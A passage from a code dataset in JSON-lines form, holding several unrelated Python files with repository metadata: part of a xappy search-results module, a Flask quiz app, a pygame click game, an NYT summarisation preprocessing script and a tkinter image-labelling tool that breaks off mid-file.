get_estimated(self):\n if self.cache_stats[2] is None:\n self.cache_stats[2] = self.mset.get_matches_estimated()\n return self.cache_stats[2]\n\n\nclass ReorderedMSetSearchResultIter(object):\n \"\"\"An iterator over a set of results from a search which have been\n reordered.\n\n \"\"\"\n def __init__(self, mset, order, context):\n self.mset = mset\n self.order = order\n self.context = context\n self.it = iter(self.order)\n\n def next(self):\n index = self.it.next()\n msetitem = self.mset.get_hit(index)\n return SearchResult(msetitem, self.context)\n\n\nclass ReorderedMSetResultOrdering(object):\n def __init__(self, mset, mset_order, context):\n self.mset = mset\n self.mset_order = mset_order\n self.context = context\n\n def get_iter(self):\n \"\"\"Get an iterator over the search results.\n\n \"\"\"\n return ReorderedMSetSearchResultIter(self.mset, self.mset_order,\n self.context)\n\n def get_hit(self, index):\n \"\"\"Get the hit with a given index.\n\n \"\"\"\n msetitem = self.mset.get_hit(self.mset_order[index])\n return SearchResult(msetitem, self.context)\n\n def get_startrank(self):\n return self.mset.get_firstitem()\n\n def get_endrank(self):\n return self.mset.get_firstitem() + len(self.mset)\n\n def __len__(self):\n \"\"\"Get the number of items in this ordering.\n\n \"\"\"\n return len(self.mset_order)\n\n\nclass NoFacetResults(object):\n \"\"\"Stub used when no facet results asked for.\n\n \"\"\"\n def __init__(self, *args, **kwargs):\n pass\n\n def get_facets(self):\n raise errors.SearchError(\"Facet selection wasn't enabled when the search was run\")\n\n def get_suggested_facets(self, maxfacets, required_facets):\n raise errors.SearchError(\"Facet selection wasn't enabled when the search was run\")\n\n\nclass FacetResults(object):\n \"\"\"The result of counting facets.\n\n \"\"\"\n def __init__(self, facetspies, facetfields, facethierarchy, facetassocs,\n desired_num_of_categories, cache_facets):\n self.facetspies = facetspies\n self.facetfields = facetfields\n self.facethierarchy = facethierarchy\n self.facetassocs = facetassocs\n\n self.facetvalues = {}\n self.facetscore = {}\n for field, slot, facettype in facetfields:\n values, score = self._calc_facet_value(slot, facettype,\n desired_num_of_categories)\n self.facetvalues[field] = values\n self.facetscore[field] = score\n\n if cache_facets is not None:\n self.facetvalues.update(cache_facets)\n self.facetscore.update((fieldname, 0)\n for fieldname, _ in cache_facets)\n\n def _calc_facet_value(self, slot, facettype, desired_num_of_categories):\n \"\"\"Calculate the facet value for a given slot, and return it.\n\n \"\"\"\n facetspy = self.facetspies.get(slot, None)\n if facetspy is None:\n return (), 0\n else:\n if facettype == 'float':\n if hasattr(xapian, 'UnbiasedNumericRanges'):\n try:\n # backwards compatibility\n ranges = xapian.UnbiasedNumericRanges(\n facetspy.get_values(), desired_num_of_categories)\n except AttributeError:\n ranges = xapian.UnbiasedNumericRanges(\n facetspy, desired_num_of_categories)\n else:\n ranges = xapian.NumericRanges(facetspy.get_values(),\n desired_num_of_categories)\n values = tuple(sorted(ranges.get_ranges_as_dict().iteritems()))\n else:\n try:\n values = tuple((item.term, item.termfreq)\n for item in facetspy.values())\n except AttributeError:\n # backwards compatibility\n values = facetspy.get_values_as_dict()\n values = tuple(sorted(values.iteritems()))\n score = math.fabs(len(values) - desired_num_of_categories)\n if len(values) <= 1:\n score = 1000\n return values, score\n\n def get_facets(self):\n \"\"\"Get all the calculated facets.\n\n Returns a dictionary, mapping from field name to the values for that\n field.\n\n \"\"\"\n return self.facetvalues\n\n def get_suggested_facets(self, maxfacets, required_facets):\n \"\"\"Get the suggested facets. Parameters and return value are as for\n `SearchResults.get_suggested_facets()`.\n\n \"\"\"\n if isinstance(required_facets, basestring):\n required_facets = [required_facets]\n scores = []\n\n for field in self.facetvalues.iterkeys():\n score = self.facetscore[field] \n scores.append((score, field))\n\n # Sort on whether facet is top-level ahead of score (use subfacets first),\n # and on whether facet is preferred for the query type ahead of anything else\n if self.facethierarchy:\n # Note, tuple[-1] is the value of 'field' in a scores tuple\n scores = [(tuple[-1] not in self.facethierarchy,) + tuple for tuple in scores]\n if self.facetassocs:\n preferred = IndexerConnection.FacetQueryType_Preferred\n scores = [(self.facetassocs.get(tuple[-1]) != preferred,) + tuple for tuple in scores]\n scores.sort()\n if self.facethierarchy:\n index = 1\n else:\n index = 0\n if self.facetassocs:\n index += 1\n if index > 0:\n scores = [tuple[index:] for tuple in scores]\n\n results = []\n required_results = []\n for score, field in scores:\n # Check if the facet is required\n required = False\n if required_facets is not None:\n required = field in required_facets\n\n # If we've got enough facets, and the field isn't required, skip it\n if not required and len(results) + len(required_results) >= maxfacets:\n continue\n\n values = self.facetvalues[field] \n\n # Required facets must occur at least once, other facets must occur\n # at least twice.\n if required:\n if len(values) < 1:\n continue\n else:\n if len(values) <= 1:\n continue\n\n score = self.facetscore[field] \n if required:\n required_results.append((score, field, values))\n else:\n results.append((score, field, values))\n\n # Throw away any excess results if we have more required_results to\n # insert.\n maxfacets = maxfacets - len(required_results)\n if maxfacets <= 0:\n results = required_results\n else:\n results = results[:maxfacets]\n results.extend(required_results)\n results.sort()\n\n # Throw away the scores because they're not meaningful outside this\n # algorithm.\n results = [(field, newvalues) for (score, field, newvalues) in results]\n return results\n","repo_name":"miracle2k/xappy","sub_path":"xappy/mset_search_results.py","file_name":"mset_search_results.py","file_ext":"py","file_size_in_byte":22191,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"34"} +{"seq_id":"37056292160","text":"import os\r\n\r\nfrom flask import Flask, session, request, redirect, render_template, url_for, Response\r\nfrom http import HTTPStatus\r\nfrom db_crud import get_question_after\r\nfrom dotenv import load_dotenv\r\n\r\nimport utility_functions\r\nfrom object_types import template\r\n\r\nload_dotenv()\r\nfolder = os.getcwd() # запомнили текущую рабочую папку и создаем объект app\r\napp = Flask(__name__, template_folder=folder+\"/template\", static_folder=folder+\"/static\")\r\napp.config['SECRET_KEY'] = os.getenv('SECRET_KEY') # Получаем ключ шифрованмя из переменной среды\r\n\r\n\r\n@app.route('/', methods=[\"GET\", \"POST\"])\r\ndef index() -> template | Response | HTTPStatus:\r\n \"\"\" Корневая страница:\r\n - если пришли с запросом GET, то предаставляем список викторин;\r\n - если POST - то фиксируем id викторины и перенаправляем на вопросы \"\"\"\r\n if request.method == 'GET':\r\n utility_functions.start_quiz(-1) # сбрасываем id викторины и показываем форму выбора\r\n return utility_functions.quiz_form()\r\n elif request.method == 'POST':\r\n quest_id = request.form.get('quiz') # фиксируем выбранный номер викторины в переданных данных\r\n utility_functions.start_quiz(int(quest_id))\r\n return redirect(url_for('test'))\r\n else:\r\n return HTTPStatus.BAD_REQUEST\r\n\r\n\r\n@app.route('/test', methods=[\"GET\", \"POST\"])\r\ndef test() -> template | Response:\r\n \"\"\" Возвращает шаблон страницуы вопроса, шаблон собирается в зависимости от выбранной викторины \"\"\"\r\n if not ('quiz' in session) or int(session['quiz']) < 0:\r\n return redirect(url_for('index'))\r\n else:\r\n if request.method == 'POST': # обновляем текущее состояние в случае получения данных\r\n utility_functions.save_answers()\r\n next_question = get_question_after(session['last_question'], session['quiz'])\r\n if next_question is None or len(next_question) == 0: # Проверяем остались ли вопросы\r\n return redirect(url_for('result'))\r\n else:\r\n return utility_functions.question_form(next_question)\r\n\r\n\r\n@app.route('/result', methods=[\"GET\"])\r\ndef result() -> template | Response:\r\n \"\"\" Возвращает результат викторины в завимости от сохраненных в сессию ответов \"\"\"\r\n if 'answers' in session:\r\n html = render_template('result.html', right=session['answers'], total=session['total'])\r\n utility_functions.end_quiz() # Сперва собираем форму с результатом, а затем завершаем викторину\r\n return html\r\n else:\r\n return redirect(url_for('index'))\r\n\r\n\r\n# Точка входа\r\nif __name__ == \"__main__\":\r\n app.run(\r\n host='0.0.0.0',\r\n port=8080)\r\n","repo_name":"mementomorri/quiz_constructor","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3198,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"33770481330","text":"import pygame\nfrom pygame.draw import *\nfrom random import randint\nimport time\npygame.init()\n\n#a,b, FPS - ширина и высота экрана в пикселях, а также кол-во кадров в секунду\nFPS = 30\na = 1000\nb = 700\nscreen = pygame.display.set_mode((a,b))\n\n#Создает необходимые переменные и массивы, для дальнейшего использования\nX = []\nV_X = []\nY = []\nV_Y = []\nR = []\nCOLOR = []\nt = 1\nscore = 0\nu=0\n\n#Цвета для игры\nRED = (255, 0, 0)\nBLUE = (0, 0, 255)\nYELLOW = (255, 255, 0)\nGREEN = (0, 255, 0)\nMAGENTA = (255, 0, 255)\nCYAN = (0, 255, 255)\nBLACK = (0, 0, 0)\nCOLORS = [RED, BLUE, YELLOW, GREEN, MAGENTA, CYAN]\n\n\n\n\ndef new_ball():\n '''Создает новый шар, и записывает его характеристики в соответствующие массивы'''\n global x, y, r, v_x, v_y, color, i\n x = randint(100, 900)\n v_x = randint(-7, 7)\n v_y = randint(-7, 7)\n y = randint(100, 600)\n r = randint(10, 100)\n color = COLORS[randint(0, 5)]\n circle(screen, color, (x, y), r)\n pygame.display.update()\n X.append(x)\n V_X.append(v_x)\n Y.append(y)\n V_Y.append(v_y)\n R.append(r)\n COLOR.append(color)\n\n \n \ndef move_items():\n '''Передвигает все созданные объекты. при необходимости обеспечивает случайное отражение от\n стен.в этой функции используется t, от которой зависит величина перемещения между кадрами\n a,b - ширина и высота рабочей области приложения.'''\n for j in range (k):\n circle(screen, BLACK, (X[j], Y[j]), R[j])\n if X[j]-R[j] <= 0:\n V_X[j] = randint(1, 7)\n V_Y[j] = randint(-7, 7)\n X[j] = 0 + R[j]\n elif X[j] + R[j] >= a:\n V_X[j] = randint(-7, -1)\n V_Y[j] = randint(-7, 7)\n X[j] = a - R[j]\n elif Y[j]- R[j] <= 0:\n V_Y[j] = randint(1, 7)\n V_X[j] = randint(-7, 7)\n Y[j] = 0 + R[j]\n elif Y[j]+R[j] >= b:\n V_Y[j] = randint(-7, -1)\n V_X[j] = randint(-7, 7)\n Y[j] = b - R[j]\n X[j] = X[j] + V_X[j]*t\n Y[j] = Y[j] + V_Y[j]*t\n circle(screen, COLOR[j], (X[j], Y[j]), R[j])\n pygame.display.update()\n \n\ndef check_click():\n '''Проверяет, попал ли игрок по мишеням. При попадании создает новую мишень'''\n global score\n for j in range (k):\n if R[j] - ((event.pos[0]-X[j])**2+(event.pos[1]-Y[j])**2)**0.5 > 0:\n score += 1\n print(\"Вы попали!!! Теперь ваш счёт: \", score)\n circle(screen, BLACK, (X[j], Y[j]), R[j])\n X.pop(j)\n Y.pop(j)\n R.pop(j)\n V_Y.pop(j)\n V_X.pop(j)\n COLOR.pop(j)\n new_ball()\n \n \ndef create_k_balls():\n '''создает k шаров'''\n global u\n while u 0:\n return None\n\n article_xml = soup.find(\"block\", {\"class\": \"full_text\"})\n if article_xml is None:\n return None\n\n article_text = get_article_text(article_xml)\n if len(article_text.split()) < 200:\n return None\n \n abstract_xml = soup.find(\"abstract\")\n if abstract_xml is not None:\n abs_txt = abstract_xml.get_text()\n else:\n abs_txt = \"\"\n\n online_lead_xml = soup.find(\n \"block\", {\"class\": \"online_lead_paragraph\"})\n if online_lead_xml is not None:\n online_lead_txt = online_lead_xml.get_text()\n else: \n online_lead_txt = \"\"\n if len(abs_txt.split()) + len(online_lead_txt.split()) < 100:\n return None\n doc_id = soup.find(\"doc-id\")[\"id-string\"]\n \n for ww in nyt_remove_words:\n abs_txt = abs_txt.replace(ww, '')\n\n return article_text, abs_txt, online_lead_txt, doc_id, sections\n\ndef prepare_example(article_text, abstract_text, ol_text, doc_id, sections):\n global nlp\n inputs = []\n article_text = article_text.replace(\"\\n\", \" \")\n doc = nlp(article_text)\n for sent in doc.sentences:\n tokens_all = [w for w in sent.words\n if w.text.strip() != '']\n if len(tokens_all) == 0:\n continue\n tokens = [w.text.strip() for w in tokens_all]\n pretty_text = sent.text.strip()\n pretty_text = re.sub(r\"\\r|\\n|\\t\", r\" \", pretty_text)\n pretty_text = re.sub(r\"\\s+\", r\" \", pretty_text)\n inputs.append({\"tokens\": tokens, \"text\": pretty_text, \"word_count\": len(pretty_text.split())})\n for i, inp in enumerate(inputs, 1):\n inp[\"sentence_id\"] = i\n\n summary_texts = []\n if len(abstract_text) > 0:\n summary_texts.append(abstract_text)\n input_texts = [inp[\"text\"] if inp[\"word_count\"] > 2 else \"@@@@@\"\n for inp in inputs[:50]]\n\n # ROUGE 1 score.\n ranks, pairwise_ranks = rouge_papier.compute_extract(\n input_texts, summary_texts, mode=\"sequential\", ngram=1,\n remove_stopwords=True, length=100)\n\n labels = [1 if r > 0 else 0 for r in ranks]\n if len(labels) < len(inputs):\n labels.extend([0] * (len(inputs) - len(labels)))\n example = {\"id\": doc_id, \"inputs\": inputs, \"sections\": sections}\n return example, labels, abstract_text, ol_text\n\ndef init_worker():\n global nlp\n nlp = stanza.Pipeline('en', processors='tokenize')\n\ndef worker(args):\n content, outputs_dir, model = args\n\n # Process xml to get document and summary text. \n doc_data = extract_doc(content)\n if doc_data is None:\n return False\n article_text, abs_txt, online_lead_txt, doc_id, sections = doc_data\n if len(abs_txt) < 50:\n return False\n example, labels, abstract_text, ol_text = prepare_example(\n article_text, abs_txt, online_lead_txt, doc_id, sections)\n\n assert abstract_text == abs_txt\n assert online_lead_txt == ol_text\n\n assert len(labels) == len(example[\"inputs\"])\n\n \n # if the amount of tokens up to the third index sentence is greater than 512, return false.\n label_locs = [i for i, value in enumerate(labels) if value == 1]\n token_count = 0\n for x in range(label_locs[2]+1):\n token_count += len(example[\"inputs\"][x][\"tokens\"])\n token_count += (label_locs[2]+1)*2\n\n # print(label_locs)\n # print(example['id'], token_count)\n\n if token_count > 512:\n return False\n\n if model == \"barthes\":\n outputs_path = outputs_dir / \"{}.tsv\".format(example[\"id\"])\n with open(outputs_path, \"w\", encoding='utf-8') as outfile:\n for i, sent in enumerate(example[\"inputs\"][::]):\n text = sent[\"tokens\"]\n pretty_text = \" \".join(text)\n pretty_text = re.sub(r\"\\r|\\n|\\t\", r\" \", pretty_text)\n pretty_text = re.sub(r\"\\s+\", r\" \", pretty_text)\n if labels[i] == 1:\n print(\"1\\t\", end=\"\", file=outfile)\n print(pretty_text, file=outfile)\n else:\n print(\"0\\t\", end=\"\", file=outfile)\n print(pretty_text, file=outfile)\n print(\"0\\t\", end=\"\", file=outfile)\n print(\"<|endoftext|>\", end=\"\", file=outfile)\n return True\n \n elif model == \"presumm\":\n outputs_path = outputs_dir / \"nyt.{}.test.json\".format(example[\"id\"])\n with open(outputs_path, \"w\", encoding='utf-8') as outfile:\n doc = {\n \"src\": [],\n \"tgt\": labels\n }\n for i, sent in enumerate(example[\"inputs\"][::]):\n # save each sentence as a list.\n text = sent[\"tokens\"]\n pretty_text = \" \".join(text)\n pretty_text = re.sub(r\"\\r|\\n|\\t\", r\" \", pretty_text)\n pretty_text = re.sub(r\"\\s+\", r\" \", pretty_text)\n words = pretty_text.split()\n doc[\"src\"].append(words)\n json.dump(doc, outfile)\n\n return True\n\ndef preprocess_part(tar_paths, outputs_dir, model, procs=16):\n\n outputs_dir.mkdir(exist_ok=True, parents=True)\n\n def data_iter():\n for tar_path in tar_paths:\n for content in doc_iter(tar_path):\n yield content, outputs_dir, model\n \n pool = multiprocessing.Pool(procs, initializer=init_worker)\n count = 0\n for i, is_good in enumerate(pool.imap(worker, data_iter()), 1):\n if is_good:\n count += 1\n print(\"{}\".format(count), end=\"\\r\", flush=True)\n print()\n\ndef main(args):\n\n procs = min(multiprocessing.cpu_count(), 16)\n\n paths = get_paths(args.nyt)\n\n train_paths = paths[:-30]\n valid_paths = paths[-30:-18]\n test_paths = paths[-18:]\n print(train_paths[0], train_paths[-1])\n print(valid_paths[0], valid_paths[-1])\n print(test_paths[0], test_paths[-1])\n\n # Preprocess the validation data. 5000\n # preprocess_part(\n # valid_paths, \n # args.data_dir / args.model / \"nyt\" / \"valid\",\n # procs=procs)\n\n preprocess_part(\n test_paths, \n args.data_dir / args.model / \"nyt\" / \"test\",\n args.model,\n procs=procs)\n\n # preprocess_part(\n # train_paths, \n # args.data_dir / args.model / \"nyt\" / \"train\",\n # procs=procs)\n\nif __name__ == \"__main__\":\n stanza.download('en')\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--nyt\", type=pathlib.Path, required=True)\n parser.add_argument(\"--model\", type=str, required=True)\n parser.add_argument(\"--data-dir\", type=pathlib.Path, required=True)\n args = parser.parse_args()\n main(args)","repo_name":"jordankettles/long_narratives","sub_path":"preprocessing/preprocess_nyt.py","file_name":"preprocess_nyt.py","file_ext":"py","file_size_in_byte":8360,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"3311901891","text":"import tkinter\r\nimport PIL.Image, PIL.ImageTk\r\nfrom tkinter import *\r\nfrom tkinter import ttk\r\nfrom tkinter import filedialog\r\nimport numpy as np\r\nimport os\r\nfrom B_box import my_Buttonbox\r\n\r\ndef compute_resize_factor(h,w,win_h,win_w):\r\n print(h)\r\n print(win_h)\r\n rf=(0.85*win_h)/h\r\n while True:\r\n rf -= 0.01\r\n if rf*w<(0.95*win_w):\r\n print(rf)\r\n return rf\r\n rf-=0.01\r\n\r\n\r\n# The factory function\r\ndef dnd_start(source, event):\r\n h = DndHandler(source, event)\r\n if h.root:\r\n return h\r\n else:\r\n return None\r\n\r\n\r\n# The class that does the work\r\n\r\nclass DndHandler:\r\n\r\n root = None\r\n\r\n def __init__(self, source, event):\r\n if event.num > 5:\r\n return\r\n root = event.widget._root()\r\n try:\r\n root.__dnd\r\n return # Don't start recursive dnd\r\n except AttributeError:\r\n root.__dnd = self\r\n self.root = root\r\n self.source = source\r\n self.target = None\r\n self.initial_button = button = event.num\r\n self.initial_widget = widget = event.widget\r\n self.release_pattern = \"\" % (button, button)\r\n self.save_cursor = widget['cursor'] or \"\"\r\n widget.bind(self.release_pattern, self.on_release)\r\n widget.bind(\"\", self.on_motion)\r\n widget['cursor'] = \"hand2\"\r\n\r\n def __del__(self):\r\n root = self.root\r\n self.root = None\r\n if root:\r\n try:\r\n del root.__dnd\r\n\r\n except AttributeError:\r\n pass\r\n\r\n def on_motion(self, event):\r\n x, y = event.x_root, event.y_root\r\n target_widget = self.initial_widget.winfo_containing(x, y)\r\n source = self.source\r\n new_target = None\r\n while target_widget:\r\n try:\r\n attr = target_widget.dnd_accept\r\n except AttributeError:\r\n pass\r\n else:\r\n new_target = attr(source, event)\r\n if new_target:\r\n break\r\n target_widget = target_widget.master\r\n old_target = self.target\r\n if old_target is new_target:\r\n if old_target:\r\n old_target.dnd_motion(source, event)\r\n else:\r\n if old_target:\r\n self.target = None\r\n old_target.dnd_leave(source, event)\r\n if new_target:\r\n new_target.dnd_enter(source, event)\r\n self.target = new_target\r\n\r\n def on_release(self, event):\r\n self.finish(event, 1)\r\n\r\n def cancel(self, event=None):\r\n self.finish(event, 0)\r\n\r\n def finish(self, event, commit=0):\r\n target = self.target\r\n source = self.source\r\n widget = self.initial_widget\r\n root = self.root\r\n try:\r\n del root.__dnd\r\n self.initial_widget.unbind(self.release_pattern)\r\n self.initial_widget.unbind(\"\")\r\n widget['cursor'] = self.save_cursor\r\n self.target = self.source = self.initial_widget = self.root = None\r\n if target:\r\n if commit:\r\n target.dnd_commit(source, event)\r\n else:\r\n target.dnd_leave(source, event)\r\n finally:\r\n source.dnd_end(target, event)\r\n\r\n\r\n\r\n# ----------------------------------------------------------------------\r\n# The rest is here for testing and demonstration purposes only!\r\n\r\nclass Icon:\r\n\r\n def __init__(self, name,type=-1,prev=False):\r\n self.name = name\r\n self.canvas = self.label = self.id = None\r\n self.prev=prev\r\n self.type=type\r\n\r\n def attach(self, canvas, x=100, y=100,w_s=100):\r\n\r\n if canvas is self.canvas:\r\n self.canvas.coords(self.id, x, y)\r\n return\r\n if self.canvas:\r\n self.detach()\r\n if not canvas:\r\n return\r\n txt=self.name\r\n ww=5\r\n hh=1\r\n ccolor='red'\r\n if self.prev:\r\n txt='type '+self.type\r\n ww=5\r\n hh=2\r\n ccolor='blue'\r\n label = tkinter.Label(canvas, text=txt,\r\n borderwidth=0,bg=ccolor,cursor=\"hand1\",height=hh, width=ww)\r\n\r\n id = canvas.create_window(x, y-w_s, window=label, anchor=\"nw\")\r\n self.canvas = canvas\r\n self.label = label\r\n self.id = id\r\n label.bind(\"\", self.press)\r\n\r\n\r\n def detach(self):\r\n canvas = self.canvas\r\n if not canvas:\r\n return\r\n id = self.id\r\n label = self.label\r\n self.canvas = self.label = self.id = None\r\n canvas.delete(id)\r\n label.destroy()\r\n\r\n def press(self, event):\r\n if dnd_start(self, event):\r\n # where the pointer is relative to the label widget:\r\n self.x_off = event.x\r\n self.y_off = event.y\r\n # where the widget is relative to the canvas:\r\n self.x_orig, self.y_orig = self.canvas.coords(self.id)\r\n\r\n def putback(self):\r\n self.canvas.coords(self.id, self.x_orig, self.y_orig)\r\n\r\n def where(self, canvas, event,w_s=100):\r\n # where the corner of the canvas is relative to the screen:\r\n x_org = canvas.winfo_rootx()\r\n y_org = canvas.winfo_rooty()\r\n # where the pointer is relative to the canvas widget:\r\n x = event.x_root - x_org\r\n y = event.y_root - y_org\r\n cell_x=x\r\n cell_y=y+w_s\r\n # compensate for initial pointer offset\r\n return x - self.x_off, y - self.y_off,cell_x,cell_y\r\n\r\n def dnd_end(self, target, event):\r\n pass\r\nclass App1:\r\n def __init__(self, window, window_title):\r\n self.window = window\r\n self.window.title(window_title)\r\n self.widthpixels = self.window.winfo_screenwidth()\r\n self.heightpixels = self.window.winfo_screenheight()\r\n print(self.heightpixels, self.widthpixels)\r\n self.resize_factor = None\r\n self.window.geometry('{}x{}'.format(self.widthpixels, self.heightpixels))\r\n self.button_frame = Frame(self.window)\r\n self.button_frame.pack(side=BOTTOM, fill=Y)\r\n self.button_frame2 = Frame(self.window)\r\n self.button_frame2.pack(side=LEFT, fill=Y)\r\n self.img_frame = Frame(self.window)\r\n self.img_frame.pack(anchor=tkinter.CENTER, expand=True)\r\n labelframe1 = LabelFrame(self.button_frame, text='')\r\n labelframe1.pack(fill=\"both\", expand=\"yes\")\r\n self.labelframe3 = LabelFrame(self.window, text='')\r\n self.labelframe3.pack(side=BOTTOM, fill=Y)\r\n labelframe2 = LabelFrame(self.button_frame2, text='Working panel')\r\n labelframe2.pack(fill=\"both\", expand=\"yes\")\r\n self.choose_button = Button(labelframe2, text='import folder', height=2, width=10, command=self.select)\r\n self.choose_button.grid(row=0, column=0)\r\n self.start_button = Button(labelframe2, text='start', height=2, width=10, command=self.start)\r\n self.start_button.grid(row=1, column=0)\r\n self.start_button.config(state=\"disabled\")\r\n self.prev_button = Button(labelframe1, text='Prev', height=1, width=10,command=self.prev)\r\n self.prev_button.grid(row=0, column=1)\r\n self.prev_button.config(state=\"disabled\")\r\n self.next_button = Button(labelframe1, text='Next', height=1, width=10,command=self.next)\r\n self.next_button.grid(row=0, column=2)\r\n self.next_button.config(state=\"disabled\")\r\n self.cancel_button = Button(labelframe2, text='cancel', height=2, width=10,command=self.cancel)\r\n self.cancel_button.grid(row=3, column=0)\r\n self.cancel_button.config(state=\"disabled\")\r\n self.addt_button = Button(labelframe2, text='Add cell', height=2, width=10,cursor=\"plus\",command=self.add_tracker)\r\n self.addt_button.grid(row=2, column=0)\r\n self.addt_button.config(state=\"disabled\")\r\n temp = ttk.Separator(labelframe2, orient=HORIZONTAL)\r\n temp.grid(row=4, column=0, pady=10, sticky=\"ew\")\r\n self.wsize_label=Label(labelframe2,text='Window Size: 100')\r\n self.wsize_label.grid(row=5, column=0,pady=10)\r\n size_frame=Frame(labelframe2)\r\n size_frame.grid(row=6, column=0)\r\n self.up_size = Button(size_frame, text='+', height=2, width=5,command=self.up_size)\r\n self.up_size.grid(row=0, column=0)\r\n self.down_size = Button(size_frame, text='-', height=2, width=5,command=self.down_size)\r\n self.down_size.grid(row=0, column=1)\r\n self.var = IntVar()\r\n self.def_size=Checkbutton(labelframe2, text=\"set as default size\",variable=self.var,command=self.change_size)\r\n self.def_size.grid(row=7, column=0)\r\n temp2 = ttk.Separator(labelframe2, orient=HORIZONTAL)\r\n temp2.grid(row=8, column=0, pady=10, sticky=\"ew\")\r\n self.video_selected=False\r\n self.tracker_num=0\r\n self.Icons=[]\r\n self.add_selected=False\r\n self.vid=None\r\n if os.path.exists('window_size.txt'):\r\n with open('window_size.txt', \"r\") as ins2:\r\n lines = ins2.read().splitlines()\r\n self.p_size=int(lines[0])\r\n ss = 'Window Size: ' + str(self.p_size)\r\n self.wsize_label.config(text=ss)\r\n\r\n else:\r\n self.p_size=100\r\n self.window.protocol(\"WM_DELETE_WINDOW\", self.on_closing)\r\n\r\n def close_help(self):\r\n self.helpmaster.destroy()\r\n def change_size(self):\r\n #print(self.var.get())\r\n if self.var.get():\r\n ff=open('window_size.txt','w')\r\n ff.write(str(self.p_size)+'\\n')\r\n ff.close()\r\n def up_size(self):\r\n self.p_size+=5\r\n ss='Window Size: '+str(self.p_size)\r\n self.wsize_label.config(text=ss)\r\n print(self.tracker_num)\r\n self.load_all()\r\n\r\n\r\n\r\n def down_size(self):\r\n self.p_size-=5\r\n ss='Window Size: '+str(self.p_size)\r\n self.wsize_label.config(text=ss)\r\n print(self.tracker_num)\r\n self.load_all()\r\n\r\n\r\n def get_frame(self,frame_number):\r\n if frame_number>=0 and frame_number\", lambda event, a=k: self.right_click(event,a))\r\n self.canvas.create_rectangle(xx-self.p_size,yy-self.p_size,xx+self.p_size,yy+self.p_size)\r\n self.canvas.create_oval(xx-1,yy-1,xx+1,yy+1)\r\n self.cell_mid.append([xx,yy])\r\n self.rect_xy.append([xx-self.p_size,yy-self.p_size,xx+self.p_size,yy+self.p_size])\r\n ff=open(self.out_folder + '/'+tracker_name+'.txt', 'w')\r\n ff.write(str(int(xx/self.resize_factor)) + ',' + str(int(yy/self.resize_factor)) + '\\n')\r\n ff.close()\r\n\r\n def right_click(self,event,k):\r\n self.menu = Menu(self.canvas, tearoff=0)\r\n self.menu.add_radiobutton(label='label and save',command=lambda a=k: self.tag(k))\r\n self.is_right=True\r\n self.menu.post(event.x_root, event.y_root)\r\n def load_all(self):\r\n for child in self.canvas.winfo_children():\r\n child.destroy()\r\n img, ret = self.get_frame(self.frame_counter)\r\n ww = np.size(img,0)\r\n hh = np.size(img,1)\r\n print(hh,ww)\r\n self.photo = PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(img))\r\n self.canvas.create_image(0, 0, image=self.photo, anchor=tkinter.NW)\r\n self.tracker_num = 0\r\n self.Icons = []\r\n self.rect_xy = []\r\n self.cell_mid = []\r\n self.add_selected = False\r\n self.is_right = False\r\n self.out_folder = self.video_folder + '/' + self.frame_names[self.frame_counter]\r\n if os.path.exists(self.out_folder) == False:\r\n os.makedirs(self.out_folder)\r\n else:\r\n\r\n names=[]\r\n for root, dirnames, filenames in os.walk(self.out_folder):\r\n for filename in filenames:\r\n if filename.endswith(\".txt\"):\r\n names.append(int(filename.split('.')[0]))\r\n if len(names)>0:\r\n self.tracker_num =max(names)\r\n for k in range(0,self.tracker_num):\r\n tracker_name = str(k+1)\r\n ff = open(self.out_folder+'/'+tracker_name+'.txt', 'r')\r\n aa = ff.readline()\r\n xx = int(aa.split(',')[0])*self.resize_factor\r\n yy = int(aa.split(',')[1])*self.resize_factor\r\n self.Icons.append(Icon(tracker_name))\r\n self.Icons[k].attach(self.canvas, xx, yy, self.p_size)\r\n self.Icons[k].label.bind(\"\", lambda event, a=k: self.right_click(event, a))\r\n self.canvas.create_rectangle(xx - self.p_size, yy - self.p_size, xx + self.p_size,\r\n yy + self.p_size)\r\n self.canvas.create_oval(xx - 1, yy - 1, xx + 1, yy + 1)\r\n self.cell_mid.append([xx, yy])\r\n self.rect_xy.append([xx - self.p_size, yy - self.p_size, xx + self.p_size, yy + self.p_size])\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n def start(self):\r\n\r\n self.start_button.config(state=\"disabled\")\r\n self.choose_button.config(state=\"disabled\")\r\n for child in self.img_frame.winfo_children():\r\n child.destroy()\r\n self.tracker_num=0\r\n self.Icons=[]\r\n self.rect_xy=[]\r\n self.cell_mid=[]\r\n self.add_selected = False\r\n self.is_right=False\r\n #self.window_size=100\r\n self.next_button.config(state=\"normal\")\r\n self.prev_button.config(state=\"normal\")\r\n self.cancel_button.config(state=\"normal\")\r\n self.addt_button.config(state=\"normal\")\r\n self.prev_label=0\r\n if os.path.exists('output') == False:\r\n os.makedirs('output')\r\n out_name = self.video_source.split('/')[-1]\r\n if os.path.exists('output/' + out_name) == False:\r\n os.makedirs('output/' + out_name)\r\n matches = []\r\n names=[]\r\n for root, dirnames, filenames in os.walk(self.video_source):\r\n for filename in filenames:\r\n if filename.endswith(\".jpg\"):\r\n matches.append(os.path.join(root, filename))\r\n names.append(filename)\r\n self.frames=matches\r\n self.frame_names=names\r\n self.frame_num=len(matches)\r\n self.video_folder='output/' + out_name\r\n #img=cv2.imread(matches[0])\r\n img =np.asanyarray( PIL.Image.open(matches[0]))\r\n self.width=np.size(img,1)\r\n self.height=np.size(img,0)\r\n self.resize_factor = compute_resize_factor(self.height, self.width, self.heightpixels, self.widthpixels)\r\n #img,ret=self.get_frame(0)\r\n #ww = np.size(img,0)\r\n #hh = np.size(img,1)\r\n #print(hh,ww)\r\n #print(self.height, self.width)\r\n #print(int(self.height * self.resize_factor),int(self.width * self.resize_factor))\r\n self.canvas = tkinter.Canvas(self.img_frame, width=int(self.width*self.resize_factor), height=int(self.height*self.resize_factor))\r\n self.canvas.pack()\r\n self.canvas.bind('', self.click)\r\n self.canvas.dnd_accept = self.dnd_accept\r\n self.frame_counter = -1\r\n self.next()\r\n\r\n\r\n\r\n def click_bar(self,event,k):\r\n print('click:'+str(k))\r\n def 